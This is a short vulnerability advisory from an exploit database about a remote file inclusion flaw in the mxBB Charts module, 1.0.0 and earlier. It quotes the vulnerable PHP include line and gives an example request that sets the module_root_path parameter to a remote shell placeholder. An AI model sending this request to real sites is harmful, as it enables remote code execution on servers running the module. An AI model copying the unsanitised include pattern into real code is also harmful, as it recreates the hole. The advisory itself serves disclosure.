id: 1264
date: 12/16/2006
title: mxBB Module Charts <= 1.0.0 Remote File Inclusion Vulnerability
author: ajann
cves: 

===============================================================
mxBB Module Charts <= 1.0.0 Remote File Inclusion Vulnerability
===============================================================



*******************************************************************************************
# Title   :  mxBB Module Charts <= 1.0.0(module_root_path) Remote File Include Vulnerability
# Author  :  ajann
# Contact :  :(

*******************************************************************************************

[[ERROR]]]------------------------------------------------------
....
..
include($module_root_path . 'language/lang_' . $language . '/lang_charts.' .  $phpEx);
....
..
[[ERROR]]]---------------------------------------------------------

Example:

//[path]/modules/mx_charts/charts_constants.php?module_root_path=[shell]

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!



#  0day.today [2023-03-27]  #